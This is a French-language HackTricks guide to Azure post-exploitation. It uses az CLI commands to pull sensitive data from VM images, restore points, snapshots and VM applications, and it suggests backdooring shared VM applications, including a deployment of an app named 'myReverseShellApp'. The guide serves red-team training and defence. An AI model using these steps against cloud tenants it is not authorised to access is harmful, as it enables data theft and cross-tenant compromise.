Az - VMs & Network Post Exploitation

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

VMs & Réseau

Pour plus d’informations sur les VMs Azure et le réseau, consultez la page suivante :

Az - Virtual Machines & Network

Pivotement d’application VM

Les applications VM peuvent être partagées avec d’autres abonnements et locataires. Si une application est partagée, c’est probablement parce qu’elle est utilisée. Donc, si l’attaquant parvient à compromettre l’application et télécharge une version avec un backdoor, il pourrait être possible qu’elle soit exécutée dans un autre locataire ou abonnement.

Informations sensibles dans les images

Il pourrait être possible de trouver des informations sensibles à l’intérieur des images prises des VMs dans le passé.

  1. Lister les images des galeries
# Get galleries
az sig list -o table

# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table

# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
  1. Lister les images personnalisées
az image list -o table
  1. Créer une VM à partir de l’ID d’image et rechercher des informations sensibles à l’intérieur.
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys

Informations sensibles dans les points de restauration

Il pourrait être possible de trouver des informations sensibles à l’intérieur des points de restauration.

  1. Lister les points de restauration
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
  1. Créer un disque à partir d’un point de restauration
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
  1. Attacher le disque à une VM (l’attaquant doit déjà avoir compromis une VM à l’intérieur du compte)
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
  1. Montez le disque et recherchez des informations sensibles
# List all available disks
sudo fdisk -l

# Check disk format
sudo file -s /dev/sdX

# Mount it
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk

Informations sensibles dans les disques et les instantanés

Il pourrait être possible de trouver des informations sensibles à l’intérieur des disques ou même des instantanés de vieux disques.

  1. Lister les instantanés
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
  1. Créer un disque à partir d’un instantané (si nécessaire)
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
  1. Attacher et monter le disque à une VM et rechercher des informations sensibles (voir la section précédente pour savoir comment faire cela)

Informations sensibles dans les extensions de VM et les applications de VM

Il pourrait être possible de trouver des informations sensibles à l’intérieur des extensions de VM et des applications de VM.

  1. Lister toutes les applications de VM
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
  1. Installez l’extension dans une VM et recherchez des informations sensibles
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks